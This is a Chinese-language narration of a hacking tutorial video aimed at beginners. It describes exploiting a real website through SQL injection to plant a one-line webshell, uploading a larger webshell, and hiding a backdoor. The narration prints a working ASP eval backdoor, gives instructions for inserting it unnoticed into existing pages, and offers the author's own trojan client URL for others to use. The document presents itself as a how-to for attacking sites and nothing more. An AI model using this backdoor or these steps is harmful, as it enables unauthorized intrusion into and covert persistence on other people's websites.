动画介绍:大家好,今天给大家做个sql的注入动画,其实呢,这样的教程已经有人做过,估计还是有人不会,下面看我操作!第一次动画,不足之处请见谅! 1.拿webshell 站点我已经找好了,有漏洞吧,下面我们检测目录,判断那个就是站点的目录,初步判断就是这个目录,我们试下,备份我们的一句话! 好了,备份完毕,看看成功没? 网吧的机器,做什么都不方便,桌面也没换,请见谅!好了,估计成功了,看看,慢,Hello , World !,成功了,呵呵 http://10hz.xinwen365.net/这是我的木马的连接端的地址,大家也可以用的,呵呵 接下来我们传大马,方便小鸟门,就详细点了,表笑哦 D:\pxql\ 物理地址 ,成功了,看看去 ,破键盘,The page cannot be found,大家也出现过这种情况吧,呵呵,杀了,换马 慢,好了,成功得到shell了,下面教大家隐藏shell,估计老鸟都会, 2.隐藏 我们还是用刚那个马 <%If request("a") ="m" then eval request("am") end if %> 就是它,困难我操作,也就是找个asp文件,把这个代码插进去,但是要注意<%和%>,弄不好会不起作用,建议插完了试一下 似乎是哪个老兄的杰作哦, 动画太大了,我就不做了,就是找个地方插进去,注意一点,里面的 a m 是可以自己换的,插上那句话后,对页面没有影响,可以正常显示,好了,动画结束! 补充下吧,方便小鸟!看操作,网吧慢 先浏览下吧,插马,是不是很隐蔽啊,页面正常的,Hello , World ! 连接成功了,好了,88~~ | |